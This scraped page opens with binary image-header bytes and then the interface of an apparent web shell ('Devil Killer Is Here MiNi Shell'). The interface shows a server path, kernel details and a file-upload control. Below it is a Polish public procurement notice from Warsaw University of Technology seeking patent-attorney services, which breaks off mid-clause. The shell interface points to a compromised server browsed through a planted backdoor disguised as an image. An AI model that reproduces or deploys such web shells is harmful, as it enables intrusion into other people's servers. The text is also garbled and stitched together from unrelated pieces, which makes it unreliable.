JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210701/0010175105-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00101751 z dnia 2021-07-01</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Międzynarodowa ochrona wynalazków opracowanych w ramach Politechniki Warszawskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA WARSZAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PLAC POLITECHNIKI 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-661</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 234 15 71</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.cziitt@pw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Międzynarodowa ochrona wynalazków opracowanych w ramach Politechniki Warszawskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e952ebd-da61-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00101751</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">05</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00099646/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.89 Świadczenie usług kompleksowego doradztwa i pośrednictwa w zakresie międzynarodowej ochrony wynalazków, prowadzonych w trybie PCT, EPO lub indywidualnych zgłoszeń w zagranicznych urzędach patentowy...</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.zamowienia.pw.edu.pl/wykaz/szczegoly.php?id=7981 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.1.	Komunikacja między Zamawiającym a Wykonawcami odbywa się w przy użyciu:<br/>1)	mini Portalu (https://miniportal.uzp.gov.pl/),<br/>2)	platformy ePUAP (https://epuap.gov.pl/wps/portal),<br/>3)	poczty elektronicznej.<br/><br/>1.	Wykonawca składa ofertę za pośrednictwem „Formularza złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu oraz na ePUAP. Sposób zaszyfrowania oferty opisany został w „Instrukcji użytkownika” dostępnej na stronie: https://miniportal.uzp.gov.pl/.<br/>2.	Oferta i wszystkie załączone dokumenty, oświadczenia składane przez Wykonawcę, składa się pod rygorem nieważności, w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby zdolne do czynności prawnych w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań finansowych. Zaleca się, aby zaszyfrowany plik był nazwany w następujący sposób: „2021_ZP08_oferta_nazwa_wykonawcy”.<br/><br/>Patrz rozdział VIII SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.2.	W postępowaniu o udzielenie zamówienia, komunikacja pomiędzy Zamawiającym a Wykonawcami (z wyłączeniem oferty Wykonawcy) w szczególności składanie pytań, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pomocą poczty elektronicznej, email: zamowienia.cziitt@pw.edu.pl.<br/><br/>Patrz rozdział VII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Patrz rozdział XIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CZIiTT-ZP08/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest świadczenie usług kompleksowego doradztwa i pośrednictwa w zakresie międzynarodowej ochrony wynalazków opracowanych w Politechnice Warszawskiej, w zależności od potrzeb Zamawiającego, w trybie:<br/>1)	indywidualnych zgłoszeń w zagranicznych urzędach patentowych,<br/>2)	EPO,<br/>3)	PCT,<br/>4)	wejście i prowadzenie postępowań krajowych/regionalnych w ramach procedury PCT,<br/>5)	walidacja patentów europejskich,<br/>w oparciu o pierwszeństwo ze zgłoszenia polskiego dokonanego uprzednio w UPRP.<br/>2.	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1, zwany dalej „OPZ”.<br/>3.	Szczegółowe warunki i zasady realizacji zamówienia określają projektowane postanowienia umowy ramowej stanowiące załącznik nr 2, zwane dalej „Projektem umowy”.<br/>4.	Zgodnie z § 2 ust. 3 Projektu umowy, „Zlecenia” będą udzielane po przeprowadzeniu postępowania, o którym mowa w § 4 Projektu umowy, na podstawie art. 314 ust. 1 pkt 3 ustawy Pzp.<br/>5.	Wykonawca „Zlecenia” będzie wybierany na podstawie kryterium oceny ofert „Cena” – 100%.<br/>6.	Okres związania umową ramową: od dnia wejścia w życie umowy ramowej do dnia 31 grudnia 2022 r.<br/>7.	W przypadku wyczerpania kwoty, jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia (która zostanie podana przed otwarciem ofert i powtórzona w § 9 ust. 1 Projektu umowy) przed upływem okresu, o którym mowa w ust. 6 Projektu umowy, umowa ulega rozwiązaniu, a jeżeli nie zostanie wyczerpana przed upływem okresu, o którym mowa w ust. 6 Projektu umowy, Zamawiającemu przysługuje uprawnienie przedłużenia okresu obowiązywania umowy o okres nie dłuższy niż 24 miesiące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79120000-1 - Usługi doradztwa w zakresie patentów i praw autorskich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">4.	W związku z możliwością zawarcia umowy ramowej co najwyżej z trzema Wykonawcami (patrz rozdział II ust. 11), Wykonawcy – strony umowy ramowej, zostaną wybrani spośród Wykonawców, którzy wykażą brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na podstawie następujących kryteriów selekcji:<br/>1)	„Liczba europejskich rzeczników patentowych” – waga: 30%;<br/>2)	„Okres posiadania tytułu europejskiego rzecznika patentowego” – waga: 20%;<br/>3)	„Liczba dokonanych zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT” – waga 50%.<br/>5.	W ramach kryterium selekcji „Liczba europejskich rzeczników patentowych”, wybór Wykonawców zostanie dokonany na podstawie liczby europejskich rzeczników patentowych, z którymi Wykonawca stale współpracuje na dzień składania oferty, a współpraca ta została nawiązana wcześniej niż 3 miesiące przed terminem składania ofert (okres trwania współpracy musi wynosić co najmniej 90 dni).<br/>6.	Zamawiający dokona wyboru Wykonawców na podstawie wzoru: liczba europejskich rzeczników patentowych, z którymi współpracuje Wykonawca / największa liczba europejskich rzeczników patentowych, z którymi współpracuje Wykonawca, spośród wszystkich ofert x 30.<br/>7.	W ramach kryterium selekcji „Okres posiadania tytułu europejskiego rzecznika patentowego”, wybór Wykonawców zostanie dokonany na podstawie liczby miesięcy posiadania tytułu europejskiego rzecznika patentowego przez rzeczników patentowych, z którymi Wykonawca współpracuje na dzień składania ofert, o których mowa w ust. 6. Okres „miesiąca” należy rozumieć jako okres 30 dni. <br/>8.	Zamawiający dokona wyboru Wykonawców na podstawie wzoru: łączna liczba miesięcy posiadania tytułu europejskiego rzecznika patentowego przez europejskich rzeczników patentowych, z którymi Wykonawca współpracuje / największa łączna liczba miesięcy posiadania tytułu europejskiego rzecznika patentowego przez europejskich rzeczników patentowych, z którymi Wykonawca współpracuje, spośród wszystkich ofert x 20.<br/>9.	W ramach kryterium selekcji „Liczba dokonanych zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT”, wybór Wykonawców zostanie dokonany na podstawie liczby dokonanych przez Wykonawcę zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT, w okresie 1 roku przed upływem terminu składania ofert.<br/>10.	Zamawiający dokona wyboru Wykonawców na podstawie wzoru: liczba dokonanych zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT / największa liczba dokonanych zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT, spośród wszystkich ofert x 50.<br/>11.	Ostateczna ocena punktowa będzie zaokrągloną do dwóch miejsc po przecinku liczbą wynikającą ze zsumowania punktów, jakie otrzyma oferta w ramach poszczególnych kryteriów selekcji.<br/>12.	Trzech Wykonawców, których oferty uzyskają najwięcej punktów w ostatecznej ocenie punktowej zostanie zaproszonych do zawarcia umowy ramowej, pod warunkiem należytego wykazania braku podstaw do wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba europejskich rzeczników patentowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres posiadania tytułu europejskiego rzecznika patentowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba dokonanych zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,0</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na zasadach określonych w rozdziale IV oraz spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>2.	Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej zostanie uznany za spełniony, jeżeli Wykonawca wykaże iż:<br/>1)	dysponuje i skieruje do realizacji zamówienia, co najmniej 3 osoby wpisane na listę zawodowych pełnomocników prowadzoną przez Europejski Urząd Patentowy (zwane dalej „europejskimi rzecznikami patentowymi”);<br/>2)	osoby, o których mowa w pkt 1, w okresie ostatnich 3 lat przed upływem terminu składania ofert, na rzecz różnych „zgłaszających” dokonały jako ich pełnomocnicy, co najmniej 3 zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury EPO, przy czym każda z tych osób dokonała co najmniej jednego zgłoszenia;<br/>3)	dysponuje i skieruje do realizacji zamówienia, co najmniej 3 osoby wpisane na listę rzeczników patentowych prowadzoną przez Urząd Patentowy Rzeczypospolitej Polskiej (zwane dalej „krajowymi rzecznikami patentowymi”), przy czym mogą to być europejscy rzecznicy patentowi, o których mowa w pkt 1;<br/>4)	osoby, o których mowa w pkt 3, w okresie ostatnich 3 lat przed upływem terminu składania ofert, na rzecz różnych „zgłaszających”:<br/>a)	dokonały jako ich pełnomocnicy co najmniej 3 zgłoszeń wynalazku lub wzoru użytkowego w ramach procedury PCT, przy czym każda z tych osób dokonała co najmniej jednego zgłoszenia;<br/>b)	dokonały jako ich pełnomocnicy, za pomocą pełnomocnika zagranicznego, co najmniej 3 zgłoszeń wynalazku lub wzoru użytkowego w fazie krajowej/regionalnej w wybranych państwach należących do Układu o współpracy patentowej, w następstwie przeprowadzenia procedury PCT, przy czym każda z tych osób dokonała co najmniej jednego zgłoszenia;<br/>5)	w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w następstwie przeprowadzonej procedury EPO, pośredniczył w dokonaniu co najmniej 5 walidacji patentu europejskiego;<br/>6)	w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, pośredniczył w dokonaniu co najmniej 5 zgłoszeń wynalazku lub wzoru użytkowego, bezpośrednio w urzędzie patentowym jednego z państw związanych z EPO, tj. 38 państw członkowskich, 2 państw rozszerzenia oraz 4 państw walidacyjnych i dodatkowo 15 państw wybranych z należących do Konwencji paryskiej o ochronie własności przemysłowej inne niż związane z EPO tj.: Brazylia, Kanada, Chiny, Hongkong Chiny, Indie, Indonezja, Izrael, Japonia, Kazachstan, Malezja, Meksyk, Tajwan (Chińskie Tajpej), Tajlandia, Stany Zjednoczone Ameryki, Zjednoczone Emiraty Arabskie.<br/>3.	Ocena spełniania powyższych warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie złożonych przez Wykonawców oświadczeń/dokumentów opisanych w rozdziale VI SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	Zamawiający wzywa trzech Wykonawców, którzy uzyskali najwięcej punktów na podstawie kryteriów selekcji, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych aktualnych na dzień ich złożenia:<br/>1)	oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – na formularzu, którego wzór stanowi załącznik nr 5;<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych, a Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów;<br/>3)	na potwierdzenie spełniania warunku udziału w postepowaniu, o którym mowa w rozdziale V ust. 2 pkt 1 i 3: „Wykaz osób” skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz wykształcenia oraz informacją o podstawie do dysponowania tymi osobami – na formularzu, którego wzór stanowi załącznik nr 6;<br/>4)	na potwierdzenie spełniania warunku udziału w postepowaniu, o którym mowa w rozdziale V ust. 2 pkt 2 i 4: „Wykaz usług wykonanych przez rzeczników” w okresie ostatnich 3 lat przez osoby, o których mowa w pkt 3, wraz z podaniem tytułu, numeru i daty zgłoszenia – na formularzu, którego wzór stanowi załącznik nr 7;<br/>5)	w przypadku braku informacji o zgłoszeniu w bazie EPO Espacenet lub WIPO Patentscope, Wykonawca złoży dokument potwierdzający datę dokonania zgłoszenia i jego numer;<br/>6)	na potwierdzenie spełniania warunku udziału w postepowaniu, o którym mowa w rozdziale V ust. 2 pkt 5 i 6: „Wykaz usług wykonanych przez Wykonawcę” w okresie ostatnich 3 lat, wraz z podaniem tytułu, numeru i daty walidacji/zgłoszenia – na formularzu, którego wzór stanowi załącznik nr 8;<br/>7)	w przypadku braku informacji o zgłoszeniu w bazie EPO Espacenet, Wykonawca złoży dokument potwierdzający datę dokonania walidacji/zgłoszenia i jego numer lub „wydruk” z internetowej bazy krajowego urzędu zapisany w formacie pliku .pdf zawierający te informacje.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> N.d. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>5.	Wspólników spółki cywilnej obowiązują przepisy dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wspólnicy spółki cywilnej wraz z ofertą złożą stosowne pełnomocnictwa oraz w przypadku wyboru oferty jako najkorzystniejszej, umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 10. projektowanych postanowień umowy ramowej - Zmiany treści Umowy<br/><br/>1.	Wszelkie zmiany 